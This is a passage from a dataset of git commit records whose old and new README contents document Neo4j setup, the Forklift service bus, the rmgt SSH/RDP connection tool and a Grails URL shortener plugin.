SE 8 (preferred) or 7 from Oracle (http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\/index.html) as that is what we support for production use.\n\n== Multiple Server instances on one machine ==\n\nNeo4j can be set up to run as several instances on one machine, providing for instance several databases for development.\n\nFor how to set this up, see <<ha-local-cluster>>.\nJust use the Neo4j edition of your choice, follow the guide and remember to not set the servers to run in HA mode.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44e8356c84017cfe59c683757bfb9448be81d34b","subject":"- Feature update.","message":"- Feature update.\n","repos":"dcshock\/forklift,dcshock\/forklift","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Forklift\n\nThe Enterprise Service Bus that supports building and deploying microservices quickly\nand easily. 
Forklift makes your life easier by providing common functionality that can\nbe shared easily by annotating your code. To see what it can do for you, check out the\nfull documentation.\n\nlink:doc\/forklift.adoc[Documentation]\n\n== Releases\nlink:doc\/prev_releases.adoc[Previous Releases]\n\n* v1.0\n** Kafka Connector\n** Core no longer depends on the JMS spec libraries","old_contents":"= Forklift\n\nThe Enterprise Service Bus that supports building and deploying microservices quickly\nand easily. Forklift makes your life easier by providing common functionality that can\nbe shared by easily by annotating your code. To see what it can do for you check out the\nfull documentation.\n\nlink:doc\/forklift.adoc[Documentation]\n\n== Releases\nlink:doc\/prev_releases.adoc[Previous Releases]\n\n* v1.0\n** Kafka Connector\n** Core no longer depends on the JMS specific","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d79ef3939fa925bf22a197ccc09856ae93cccab6","subject":"Fix: \u89e3\u51b3\u5728Ubuntu\u5e73\u53f0\u7f16\u8bd1\u51fa\u9519\u7684\u95ee\u9898","message":"Fix: \u89e3\u51b3\u5728Ubuntu\u5e73\u53f0\u7f16\u8bd1\u51fa\u9519\u7684\u95ee\u9898\n","repos":"fifilyu\/rmgt,fifilyu\/rmgt","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= rmgt\n\nLinux and Windows Remote Management, \u65b9\u4fbf\u5feb\u6377\u7684\u8fdc\u7a0b\u670d\u52a1\u5668\u8fde\u63a5\u5de5\u5177\n\n== \u5e73\u53f0\n\u652f\u6301 Linux(SSH) \u4ee5\u53ca Windows(RDP) \u8fdc\u7a0b\u8fde\u63a5\n\n.Linux\n* \u652f\u6301\u8bc1\u4e66\u767b\u5f55\n* \u652f\u6301\u5bc6\u7801\u767b\u5f55\n\n.Windows\n* \u4ec5\u652f\u6301\u5bc6\u7801\u767b\u5f55\n\n== \u7f16\u8bd1\u5b89\u88c5\n=== \u5b89\u88c5 Google Test\nArchLinux:: sudo pacman -S cmake g++ gtest sshpass openssl\nUbuntu:: sudo apt-get install cmake g++ libgtest-dev libssl-dev sshpass\nUbuntu 18.04:: sudo apt-get install cmake g++ googletest libssl-dev sshpass\nCentOS:: sudo yum install epel-release && sudo yum install cmake gcc-c++ gtest-devel sshpass openssl-devel\n\n.Ubuntu\u5e73\u53f0\u9700\u8981\u624b\u52a8\u89e3\u51b3\u5355\u5143\u6d4b\u8bd5\u4f9d\u8d56\n----\nmkdir \/tmp\/gtest_build\ncd \/tmp\/gtest_build\ncmake \/usr\/src\/googletest\/googletest\/\nsudo cp libgtest.a libgtest_main.a \/usr\/local\/lib\/\ncd ~\nrm -rf \/tmp\/gtest_build\n----\n\n.\u7f16\u8bd1rmgt\n----\n$ git clone https:\/\/github.com\/fifilyu\/rmgt.git\n$ mkdir rmgt_build\n$ cd rmgt_build\n$ cmake ..\/rmgt\n$ make\n$ make test\n$ cp bin\/rmgt \u4efb\u610f\u8def\u5f84 (\u6bd4\u5982\uff0ccp bin\/rmgt \/home\/fifilyu\/bin\/rmgt)\n----\n\n[NOTE]\n\u5efa\u8bae\u5c06 rmgt \u6240\u5728\u76ee\u5f55 (\u6bd4\u5982\uff0c\/home\/fifilyu\/bin) \u52a0\u5165\u73af\u5883\u53d8\u91cf `$PATH` \uff0c\u4e5f\u53ef\u76f4\u63a5\u590d\u5236\u5230 `\/usr\/local\/bin`\uff0c\u4ee5\u4f7f\u4efb\u610f\u4f4d\u7f6e\u90fd\u80fd\u627e\u5230 `rmgt` \u547d\u4ee4\u3002\n\n== \u914d\u7f6e\u6587\u4ef6\n\u4e3b\u673a\u4fe1\u606f\u5c06\u4f1a\u4fdd\u5b58\u5230\u5f53\u524d\u7528\u6237\u4e3b\u76ee\u5f55\u4e0b\uff0c\u6587\u4ef6\u540d\u4e3a `.rmgt.conf`\u3002\u6bd4\u5982\uff0c\/home\/fifilyu\/.rmgt.conf\n\n=== \u5b89\u5168\nrmgt \u5c06\u4ee5\u660e\u6587\u4fdd\u5b58\u4e3b\u673a\u4fe1\u606f\uff0c\u5305\u62ec *\u5bc6\u7801* \u3002\n\n[WARNING]\n\u73b0\u5728\uff0c\u5982\u679c\u4f60\u5bf9\u5b89\u5168\u95ee\u9898\u975e\u5e38\u654f\u611f\uff0c\u8bf7 *\u614e\u7528* rmgt \u3002\n\n== \u8fde\u63a5 Windows \u4e3b\u673a\u7684\u5206\u8fa8\u7387\u8bbe\u7f6e\n\u9ed8\u8ba4\u5206\u8fa8\u7387\u662f 800 * 
600\u3002\u5982\u679c\u9700\u8981\u91cd\u7f6e\u5206\u8fa8\u7387\uff0c\u8bf7\u76f4\u63a5\u4fee\u6539 main.cxx \u4e2d `\"-g800x600 \"` \u5373\u53ef\u3002\n\n== \u7528\u6cd5\n\n=== \u5b89\u88c5\u8f6f\u4ef6\u5305\n.\u8bf4\u660e\nopenssh:: SSH \u534f\u8bae\u5de5\u5177\u96c6\nrdesktop:: Windows \u8fdc\u7a0b\u684c\u9762\u534f\u8bae(RDP)\u5ba2\u6237\u7aef\nsshpass:: \u975e\u4ea4\u4e92\u5f0f SSH \u5bc6\u7801\u5de5\u5177\n\n.\u5b89\u88c5\u8f6f\u4ef6\nArchLinux:: sudo pacman -S openssh rdesktop sshpass\nUbuntu:: sudo apt-get install openssh-client rdesktop sshpass\nCentOS:: sudo yum install openssh-clients rdesktop sshpass (\u9700\u8981 EPEL \u6e90)\n\n=== \u589e\u52a0\u4e3b\u673a\n\n==== Linux \u5e73\u53f0\n*\u8bc1\u4e66\u767b\u5f55*\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx -p 22 -u root -d \"\u7f8e\u56fd\u4ee3\u7406\u7ebf\u8def\"`\n\nor\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx`\n\n*\u5bc6\u7801\u767b\u5f55*\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx -p 22 -u root -w password -d \"\u7f8e\u56fd\u4ee3\u7406\u7ebf\u8def\"`\n\nor\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx -w password`\n\n==== Windows \u5e73\u53f0\n*\u5bc6\u7801\u767b\u5f55*\n\n`rmgt -n ali44 -o windows -i 121.41.45.xxx -p 3389 -u administrator -w password -d \"\u963f\u91cc\u4e91\"`\n\nor\n\n`rmgt -n ali44 -o windows -i 121.41.45.xxx`\n\n=== \u8fde\u63a5\u4e3b\u673a\n\nLinux: \u5fc5\u987b\u5728\u7ec8\u7aef\u4e0b\u6267\u884c `rmgt -c usa241`\n\nWindows: \u5728\u7ec8\u7aef\u6216\u8005 X \u684c\u9762\u4e0b\u6267\u884c `rmgt -c ali44`\n\n=== \u5220\u9664\u4e3b\u673a\n\n`rmgt -r usa241`\n\n`rmgt -r ali44`\n\n== \u4f7f\u7528\u8be6\u60c5\n\u8bf7 `rmgt -h` \u67e5\u770b\u5e2e\u52a9\n\n----\nrmgt(remote management) v2.0.1 - \u65b9\u4fbf\u5feb\u6377\u7684\u8fdc\u7a0b\u670d\u52a1\u5668\u8fde\u63a5\u5de5\u5177\n\n\u7528\u6cd5 :\n\trmgt -V\n\trmgt -c <\u4e3b\u673a\u540d> [-v]\n\trmgt -l\n\trmgt -s <\u4e3b\u673a\u540d>\n\trmgt -r <\u4e3b\u673a\u540d>\n\trmgt -n <\u4e3b\u673a\u540d> -o <\u64cd\u4f5c\u7cfb\u7edf> -i <IP\u5730\u5740> -p [\u8fdc\u7a0b\u7aef\u53e3[22|3389]] -u [\u7528\u6237\u540d[root|administrator]] -w [\u5bc6\u7801] -d [\u63cf\u8ff0]\n\n\u53c2\u6570 :\n\t-c <\u4e3b\u673a\u540d>\t\t\u5c06\u8fde\u63a5\u7684\u4e3b\u673a\u540d\n\t-l \t\t\t\u663e\u793a\u6240\u6709\u4e3b\u673a\u4fe1\u606f\n\t-s <\u4e3b\u673a\u540d>\t\t\u663e\u793a\u6307\u5b9a\u4e3b\u673a\u4fe1\u606f\n\t-r <\u4e3b\u673a\u540d>\t\t\u4ece\u914d\u7f6e\u6587\u4ef6\u5220\u9664\u4e3b\u673a\n\t-n <\u4e3b\u673a\u540d>\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u4e3b\u673a\u540d\n\t-o <\u64cd\u4f5c\u7cfb\u7edf>\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u64cd\u4f5c\u7cfb\u7edf\uff0c\u53ef\u9009\u503c\uff1alinux windows\n\t-i <IP\u5730\u5740>\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6eIP\u5730\u5740\n\t-p [\u8fdc\u7a0b\u7aef\u53e3]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u8fdc\u7a0b\u7aef\u53e3\uff0clinux \u9ed8\u8ba4\u503c\uff1a22\uff0cwindows \u9ed8\u8ba4\u503c\uff1a3389\n\t-u [\u7528\u6237\u540d]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u8fdc\u7a0b\u767b\u5f55\u7528\u6237\u540d\uff0clinux \u9ed8\u8ba4\u503c\uff1aroot\uff0cwindows \u9ed8\u8ba4\u503c\uff1aadministrator\n\t-w [\u5bc6\u7801]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u5bc6\u7801\uff0c\u9ed8\u8ba4\u503c\uff1a\u7a7a\n\t-d [\u63cf\u8ff0]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u63cf\u8ff0\uff0c\u9ed8\u8ba4\u503c\uff1a\u7a7a\n\t-h <\u663e\u793a\u5e2e\u52a9\u4fe1\u606f>\t\u663e\u793a\u5e2e\u52a9\u4fe1\u606f\n\t-v 
<\u663e\u793a\u8fde\u63a5\u4fe1\u606f>\t\u663e\u793a\u8fde\u63a5\u4fe1\u606f\n\t-V <\u663e\u793a\u7248\u672c\u4fe1\u606f>\t\u663e\u793a\u7248\u672c\u4fe1\u606f\n----\n","old_contents":"= rmgt\n\nLinux and Windows Remote Management, \u65b9\u4fbf\u5feb\u6377\u7684\u8fdc\u7a0b\u670d\u52a1\u5668\u8fde\u63a5\u5de5\u5177\n\n== \u5e73\u53f0\n\u652f\u6301 Linux(SSH) \u4ee5\u53ca Windows(RDP) \u8fdc\u7a0b\u8fde\u63a5\n\n.Linux\n* \u652f\u6301\u8bc1\u4e66\u767b\u5f55\n* \u652f\u6301\u5bc6\u7801\u767b\u5f55\n\n.Windows\n* \u4ec5\u652f\u6301\u5bc6\u7801\u767b\u5f55\n\n== \u7f16\u8bd1\u5b89\u88c5\n=== \u5b89\u88c5 Google Test\nArchLinux:: sudo pacman -S cmake g++ gtest sshpass openssl\nUbuntu:: sudo apt-get install cmake g++ libgtest-dev libssl-dev sshpass\nUbuntu 18.04:: sudo apt-get install cmake g++ googletest libssl-dev sshpass\nCentOS:: sudo yum install epel-release && sudo yum install cmake gcc-c++ gtest-devel sshpass openssl-devel\n\n----\n$ git clone https:\/\/github.com\/fifilyu\/rmgt.git\n$ mkdir rmgt_build\n$ cd rmgt_build\n$ cmake ..\/rmgt\n$ make\n$ make test\n$ cp bin\/rmgt \u4efb\u610f\u8def\u5f84 (\u6bd4\u5982\uff0ccp bin\/rmgt \/home\/fifilyu\/bin\/rmgt)\n----\n\n[NOTE]\n\u5efa\u8bae\u5c06 rmgt \u6240\u5728\u76ee\u5f55 (\u6bd4\u5982\uff0c\/home\/fifilyu\/bin) \u52a0\u5165\u73af\u5883\u53d8\u91cf `$PATH` \uff0c\u4e5f\u53ef\u76f4\u63a5\u590d\u5236\u5230 `\/usr\/local\/bin`\uff0c\u4ee5\u4f7f\u4efb\u610f\u4f4d\u7f6e\u90fd\u80fd\u627e\u5230 `rmgt` \u547d\u4ee4\u3002\n\n== \u914d\u7f6e\u6587\u4ef6\n\u4e3b\u673a\u4fe1\u606f\u5c06\u4f1a\u4fdd\u5b58\u5230\u5f53\u524d\u7528\u6237\u4e3b\u76ee\u5f55\u4e0b\uff0c\u6587\u4ef6\u540d\u4e3a `.rmgt.conf`\u3002\u6bd4\u5982\uff0c\/home\/fifilyu\/.rmgt.conf\n\n=== \u5b89\u5168\nrmgt \u5c06\u4ee5\u660e\u6587\u4fdd\u5b58\u4e3b\u673a\u4fe1\u606f\uff0c\u5305\u62ec *\u5bc6\u7801* \u3002\n\n[WARNING]\n\u73b0\u5728\uff0c\u5982\u679c\u4f60\u5bf9\u5b89\u5168\u95ee\u9898\u975e\u5e38\u654f\u611f\uff0c\u8bf7 *\u614e\u7528* rmgt \u3002\n\n== \u8fde\u63a5 Windows \u4e3b\u673a\u7684\u5206\u8fa8\u7387\u8bbe\u7f6e\n\u9ed8\u8ba4\u5206\u8fa8\u7387\u662f 800 * 600\u3002\u5982\u679c\u9700\u8981\u91cd\u7f6e\u5206\u8fa8\u7387\uff0c\u8bf7\u76f4\u63a5\u4fee\u6539 main.cxx \u4e2d `\"-g800x600 \"` \u5373\u53ef\u3002\n\n== \u7528\u6cd5\n\n=== \u5b89\u88c5\u8f6f\u4ef6\u5305\n.\u8bf4\u660e\nopenssh:: SSH \u534f\u8bae\u5de5\u5177\u96c6\nrdesktop:: Windows \u8fdc\u7a0b\u684c\u9762\u534f\u8bae(RDP)\u5ba2\u6237\u7aef\nsshpass:: \u975e\u4ea4\u4e92\u5f0f SSH \u5bc6\u7801\u5de5\u5177\n\n.\u5b89\u88c5\u8f6f\u4ef6\nArchLinux:: sudo pacman -S openssh rdesktop sshpass\nUbuntu:: sudo apt-get install openssh-client rdesktop sshpass\nCentOS:: sudo yum install openssh-clients rdesktop sshpass (\u9700\u8981 EPEL \u6e90)\n\n=== \u589e\u52a0\u4e3b\u673a\n\n==== Linux \u5e73\u53f0\n*\u8bc1\u4e66\u767b\u5f55*\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx -p 22 -u root -d \"\u7f8e\u56fd\u4ee3\u7406\u7ebf\u8def\"`\n\nor\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx`\n\n*\u5bc6\u7801\u767b\u5f55*\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx -p 22 -u root -w password -d \"\u7f8e\u56fd\u4ee3\u7406\u7ebf\u8def\"`\n\nor\n\n`rmgt -n usa241 -o linux -i 142.4.114.xxx -w password`\n\n==== Windows \u5e73\u53f0\n*\u5bc6\u7801\u767b\u5f55*\n\n`rmgt -n ali44 -o windows -i 121.41.45.xxx -p 3389 -u administrator -w password -d \"\u963f\u91cc\u4e91\"`\n\nor\n\n`rmgt -n ali44 -o windows -i 121.41.45.xxx`\n\n=== \u8fde\u63a5\u4e3b\u673a\n\nLinux: \u5fc5\u987b\u5728\u7ec8\u7aef\u4e0b\u6267\u884c `rmgt -c usa241`\n\nWindows: 
\u5728\u7ec8\u7aef\u6216\u8005 X \u684c\u9762\u4e0b\u6267\u884c `rmgt -c ali44`\n\n=== \u5220\u9664\u4e3b\u673a\n\n`rmgt -r usa241`\n\n`rmgt -r ali44`\n\n== \u4f7f\u7528\u8be6\u60c5\n\u8bf7 `rmgt -h` \u67e5\u770b\u5e2e\u52a9\n\n----\nrmgt(remote management) v2.0.1 - \u65b9\u4fbf\u5feb\u6377\u7684\u8fdc\u7a0b\u670d\u52a1\u5668\u8fde\u63a5\u5de5\u5177\n\n\u7528\u6cd5 :\n\trmgt -V\n\trmgt -c <\u4e3b\u673a\u540d> [-v]\n\trmgt -l\n\trmgt -s <\u4e3b\u673a\u540d>\n\trmgt -r <\u4e3b\u673a\u540d>\n\trmgt -n <\u4e3b\u673a\u540d> -o <\u64cd\u4f5c\u7cfb\u7edf> -i <IP\u5730\u5740> -p [\u8fdc\u7a0b\u7aef\u53e3[22|3389]] -u [\u7528\u6237\u540d[root|administrator]] -w [\u5bc6\u7801] -d [\u63cf\u8ff0]\n\n\u53c2\u6570 :\n\t-c <\u4e3b\u673a\u540d>\t\t\u5c06\u8fde\u63a5\u7684\u4e3b\u673a\u540d\n\t-l \t\t\t\u663e\u793a\u6240\u6709\u4e3b\u673a\u4fe1\u606f\n\t-s <\u4e3b\u673a\u540d>\t\t\u663e\u793a\u6307\u5b9a\u4e3b\u673a\u4fe1\u606f\n\t-r <\u4e3b\u673a\u540d>\t\t\u4ece\u914d\u7f6e\u6587\u4ef6\u5220\u9664\u4e3b\u673a\n\t-n <\u4e3b\u673a\u540d>\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u4e3b\u673a\u540d\n\t-o <\u64cd\u4f5c\u7cfb\u7edf>\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u64cd\u4f5c\u7cfb\u7edf\uff0c\u53ef\u9009\u503c\uff1alinux windows\n\t-i <IP\u5730\u5740>\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6eIP\u5730\u5740\n\t-p [\u8fdc\u7a0b\u7aef\u53e3]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u8fdc\u7a0b\u7aef\u53e3\uff0clinux \u9ed8\u8ba4\u503c\uff1a22\uff0cwindows \u9ed8\u8ba4\u503c\uff1a3389\n\t-u [\u7528\u6237\u540d]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u8fdc\u7a0b\u767b\u5f55\u7528\u6237\u540d\uff0clinux \u9ed8\u8ba4\u503c\uff1aroot\uff0cwindows \u9ed8\u8ba4\u503c\uff1aadministrator\n\t-w [\u5bc6\u7801]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u5bc6\u7801\uff0c\u9ed8\u8ba4\u503c\uff1a\u7a7a\n\t-d [\u63cf\u8ff0]\t\t\u589e\u52a0\u4e3b\u673a\u65f6\uff0c\u8bbe\u7f6e\u63cf\u8ff0\uff0c\u9ed8\u8ba4\u503c\uff1a\u7a7a\n\t-h <\u663e\u793a\u5e2e\u52a9\u4fe1\u606f>\t\u663e\u793a\u5e2e\u52a9\u4fe1\u606f\n\t-v <\u663e\u793a\u8fde\u63a5\u4fe1\u606f>\t\u663e\u793a\u8fde\u63a5\u4fe1\u606f\n\t-V <\u663e\u793a\u7248\u672c\u4fe1\u606f>\t\u663e\u793a\u7248\u672c\u4fe1\u606f\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"220ad70db4c424279e224c7e4f5482f806a250d7","subject":"Added CAUTION note about case sensitive queries","message":"Added CAUTION note about case sensitive queries\n","repos":"kaleidos\/grails-url-shortener","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Grails Url Shortener\n\nimage::https:\/\/drone.io\/github.com\/lmivan\/grails-url-shortener\/status.png[alt=\"Build Status\", link=\"https:\/\/drone.io\/github.com\/lmivan\/grails-url-shortener\/latest\"]\nimage::http:\/\/stillmaintained.com\/lmivan\/grails-url-shortener.png[alt=\"Still maintained\", link=\"http:\/\/stillmaintained.com\/lmivan\/grails-url-shortener\"]\n\nThis is a grails plugin that integrates a url shortener inside your Grails application.\n\n\n== Installation\n\nIn `BuildConfig` add the following dependency:\n\n[source, groovy]\n----\ncompile \":url-shortener:<version>\"\n----\n\n== Configuration\n\nAfter installing the plugin you have to add the following configuration to your `Config.groovy` file:\n\n[source, groovy]\n----\n\/\/ Grails-url-shortener\nshortener {\n characters = ('0'..'9') + ('a'..'h') + ('j'..'k') + ('m'..'z') + ('A'..'H') + ('J'..'K') + ('M'..'Z')\n minLength = 5\n shortDomain = 
http:\/\/YOUR-SHORT-DOMAIN.COM\n}\n----\n\n* `characters` the list of valid characters for the shortened urls. In this example, the letters `i`, `l`, `I`, `L`\nare removed because they can be mixed up in some typefaces. You can create your custom list, for example,\nremoving the vowels.\n* `minLength` is the minimum number of characters for the shortened url.\n* `shortDomain` the short domain for your url shortener.\n\nCAUTION: If you include both lowercase and uppercase characters in the `characters` list you must make sure your\ndatabase\/table is configured to do **case sensitive** queries. Otherwise you could get the wrong URL back when\nquerying the database.\n\nNext you have to provide a unique number generator. The plugin provides an in-memory dummy implementation using\nAtomicLong available in the file https:\/\/github.com\/lmivan\/grails-url-shortener\/blob\/master\/src\/groovy\/net\/kaleidos\/shortener\/generator\/DummySequenceGenerator.groovy[DummySequenceGenerator].\n\nCAUTION: Please do not use this default implementation for production because the counter is reset every time\nyou start the app. You should only use this default implementation for development or test environments.\n\nTo implement your custom unique number generator you have to create a simple Groovy or Java class that implements\nthe `net.kaleidos.shortener.SequenceGenerator` interface. For example you can use a database sequence for this number\ngenerator. The following class uses a PostgreSQL sequence for this:\n\n[source, groovy]\n.\/src\/groovy\/com\/example\/shortener\/PostgresSequenceGenerator.groovy\n----\npackage com.example.shortener\n\nimport net.kaleidos.shortener.SequenceGenerator\nimport groovy.sql.Sql\n\nclass PostgresSequenceGenerator implements SequenceGenerator {\n def dataSource\n\n Long getNextNumber() {\n def db = new Sql(dataSource)\n return db.rows(\"SELECT nextval('seq_shorten_url_generator')\")[0]['nextval']\n }\n}\n----\n\nFinally, when you have created your custom generator you have to define the `sequenceGenerator` bean in your\n`resources.groovy` file:\n\n[source, groovy]\n----\nbeans = {\n ...\n sequenceGenerator(com.example.shortener.PostgresSequenceGenerator) {\n dataSource = ref(\"dataSource\")\n }\n ...\n}\n----\n\n=== Sequence Generator Plugin\n\nYou can also use the http:\/\/grails.org\/plugin\/sequence-generator[sequence-generator] plugin to generate sequence numbers\nfor short urls. Version 1.1+ of `sequence-generator` is compatible with version 0.2+ of `url-shortener`.\nJust add the `sequence-generator` plugin to your BuildConfig.groovy and you are ready to go.\n\nYou don't have to create a custom generator or configure a sequenceGenerator bean (section above),\nit is done by the `sequence-generator` plugin.\n
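\nFor reference, the plugin entry in `BuildConfig.groovy` would look roughly like this sketch (it belongs in the `plugins` block; 1.1 is the minimum version mentioned above, adjust as needed):\n\n[source, groovy]\n----\nplugins {\n compile \":sequence-generator:1.1\"\n}\n----\n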
\n\n== Usage\n\nThe plugin provides a service `urlShortenerService` that you can inject into your grails artefacts with the following\npublic methods:\n\n* `shortUrl(String targetUrl)`: Returns a short url for the target url passed as param. If the url has already been\nshortened, the same short url is returned. Be careful because this method only returns the shortened characters for\nthe target url but not the url with the configured short domain.\n* `shortUrlFullDomain(String targetUrl)`: Returns the short url with the full domain.\n* `getTargetUrl(String shortUrl)`: Returns the target url (original url) from the short url passed as param.\nThe method also increases a counter with the number of times this url has been hit. If the short url does not exist\nthe method returns null.\n\nExamples:\n\n[source, groovy]\n----\nString shortUrl = urlShortenerService.shortUrl(\"http:\/\/kaleidos.net\")\nassert shortUrl.length() == 5\n\nString shortUrlWithDomain = urlShortenerService.shortUrlFullDomain(\"http:\/\/kaleidos.net\")\nassert shortUrlWithDomain.length() > 5\nassert shortUrlWithDomain.contains(\"http:\/\/\") == true\n\nshortUrl = urlShortenerService.shortUrl(\"http:\/\/kaleidos.net\")\nassert urlShortenerService.getTargetUrl(shortUrl) == \"http:\/\/kaleidos.net\"\n----\n\nThe plugin also provides a controller that can be used to redirect to the target url.\nIt is available here\nhttps:\/\/github.com\/lmivan\/grails-url-shortener\/blob\/master\/grails-app\/controllers\/net\/kaleidos\/shortener\/ShortenerController.groovy[ShortenerController]\nor you can implement your own custom controller.\n\n=== Tag Library\n\nThe plugin provides two GSP tags that generate short urls, `link` and `createLink`. They work as the standard Grails `link` and `createLink` but generate short urls.\n\n[source, javascript]\n----\nfunction copyShortLinkToClipboard() {\n var url = \"${shorter.createLink(controller: 'person', action: 'show', id: person.id, absolute: true)}\";\n window.prompt(\"${message(code: 'copy.to.clipboard.label', 'Copy to clipboard: Ctrl+C, Enter')}\", url);\n}\n----\n\n== Author\n\nYou can send any questions to:\n\nIv\u00e1n L\u00f3pez: lopez.ivan@gmail.com (https:\/\/twitter.com\/ilopmar[@ilopmar])\n\nCollaborations are appreciated :-)\n\n\n== Release Notes\n\n* 0.2.1 - 18\/Jan\/2015 - Fix regression in 0.2 (See https:\/\/github.com\/lmivan\/grails-url-shortener\/issues\/6[#6])\n* 0.2 - 21\/Nov\/2014 - Added GSP tags `shorter:link` and `shorter:createLink`.\n* 0.1 - 17\/Oct\/2013 - Initial version of the plugin.\n","old_contents":"= Grails Url Shortener\n\nimage::https:\/\/drone.io\/github.com\/lmivan\/grails-url-shortener\/status.png[alt=\"Build Status\", link=\"https:\/\/drone.io\/github.com\/lmivan\/grails-url-shortener\/latest\"]\nimage::http:\/\/stillmaintained.com\/lmivan\/grails-url-shortener.png[alt=\"Still maintained\", link=\"http:\/\/stillmaintained.com\/lmivan\/grails-url-shortener\"]\n\nThis is a grails plugin that integrates a url shortener inside your Grails application.\n\n\n== Installation\n\nIn `BuildConfig` add the following dependency:\n\n[source, groovy]\n----\ncompile \":url-shortener:<version>\"\n----\n\n== Configuration\n\nAfter installing the plugin you have to add the following configuration to your `Config.groovy` file:\n\n[source, groovy]\n----\n\/\/ Grails-url-shortener\nshortener {\n characters = ('0'..'9') + ('a'..'h') + ('j'..'k') + ('m'..'z') + ('A'..'H') + ('J'..'K') + ('M'..'Z')\n minLength = 5\n shortDomain = http:\/\/YOUR-SHORT-DOMAIN.COM\n}\n----\n\n* `characters` the list of the valid characters for the shorted urls. In this example, the letters `i`, `l`, `I`, `L`\nare removed because they can be mix up with some typographies. You can create your custom list, for example,\nremoving the vowels.\n* `minLength` is the minimum number of characters for the shorted url.\n* `shortDomain` the short domain for your url shortener.\n\nNext you have to provide a unique number generator. 
The plugin provides an in-memory dummy implementation using\nAtomicLong available in the file https:\/\/github.com\/lmivan\/grails-url-shortener\/blob\/master\/src\/groovy\/net\/kaleidos\/shortener\/generator\/DummySequenceGenerator.groovy[DummySequenceGenerator].\n\nCAUTION: Please do not use this default implementation for production because the counter is reset every time\nyou start the app. You should only use this default implementation for develop o test environment.\n\nTo implement your custom unique number generator you have to create a simple Groovy or Java class that implements\nthe `net.kaleidos.shortener.SequenceGenerator` interface. For example you can use a database sequence for this number\ngenerator. The following class use a Postgresql sequence for this:\n\n[source, groovy]\n.\/src\/groovy\/com\/example\/shortener\/PostgresSequenceGenerator.groovy\n----\npackage com.example.shortener\n\nimport net.kaleidos.shortener.SequenceGenerator\nimport groovy.sql.Sql\n\nclass PostgresSequenceGenerator implements SequenceGenerator {\n def dataSource\n\n Long getNextNumber() {\n def db = new Sql(dataSource)\n return db.rows(\"SELECT nextval('seq_shorten_url_generator')\")[0]['nextval']\n }\n}\n----\n\nFinally, when you have created you custom generator you have to define the `sequenceGenerator` bean in your\n`resources.groovy` file:\n\n[source, groovy]\n----\nbeans = {\n ...\n sequenceGenerator(com.example.shortener.PostgresSequenceGenerator) {\n dataSource = ref(\"dataSource\")\n }\n ...\n}\n----\n\n=== Sequence Generator Plugin\n\nYou can also use the http:\/\/grails.org\/plugin\/sequence-generator[sequence-generator] plugin to generate sequence numbers\nfor short urls. Version 1.1+ of `sequence-generator` is compatible with version 0.2+ of `url-shortener`.\nJust add the `sequence-generator` plugin to your BuildConfig.groovy and you are ready to go.\n\nYou don't have to create a custom generator or configure a sequenceGenerator bean (section above),\nit done by the `sequence-generator` plugin.\n\n\n== Usage\n\nThe plugin provides a service `urlShortenerService` that you can inject into your grails artefacts with the following\npublic methods:\n\n* `shortUrl(String targetUrl)`: Returns a short url for the target url passed as param. If the url has already been\nshortened, the same short url is returned. Be careful because this method only returns the shortened characters for\nthe target url but not the url with the configured short domain.\n* `shortUrlFullDomain(String targetUrl)`: Returns the short url with the full domain.\n* `getTargetUrl(String shortUrl)`: Returns the target url (original url) from the short url passed as param.\nThe method also increase a counter with the number of times this url has been hit. 
If the short url does not exist\nthe method return null.\n\nExamples:\n\n[source, groovy]\n----\nString shortUrl = urlShortenerService.shortUrl(\"http:\/\/kaleidos.net\")\nassert shortUrl.length() == 5\n\nString shortUrlWithDomain = urlShortenerService.shortUrlFullDomain(\"http:\/\/kaleidos.net\")\nassert shortUrlWithDomain.length() > 5\nassert shortUrlWithDomain.contains(\"http:\/\/\") == true\n\nString shortUrl = urlShortenerService.shortUrl(\"http:\/\/kaleidos.net\")\nassert urlShortenerService.getTargetUrl(shortUrl) == \"http:\/\/kaleidos.net\"\n----\n\nThe plugin also provides a controller that can be used to redirect to the target url.\nIt is available here\nhttps:\/\/github.com\/lmivan\/grails-url-shortener\/blob\/master\/grails-app\/controllers\/net\/kaleidos\/shortener\/ShortenerController.groovy[ShortenerController]\nor you can implement your own custom controller.\n\n=== Tag Library\n\nThe plugin provides two GSP tags that generate short urls, `link` and `createLink`. They work as the standard Grails `link` and `createLink` but generates short urls.\n\n[source, javascript]\n----\nfunction copyShortLinkToClipboard() {\n var url = \"${shorter.createLink(controller: 'person', action: 'show', id: person.id, absolute: true)}\";\n window.prompt(\"${message(code: 'copy.to.clipboard.label', 'Copy to clipboard: Ctrl+C, Enter')}\", url);\n}\n----\n\n== Author\n\nYou can send any questions to:\n\nIv\u00e1n L\u00f3pez: 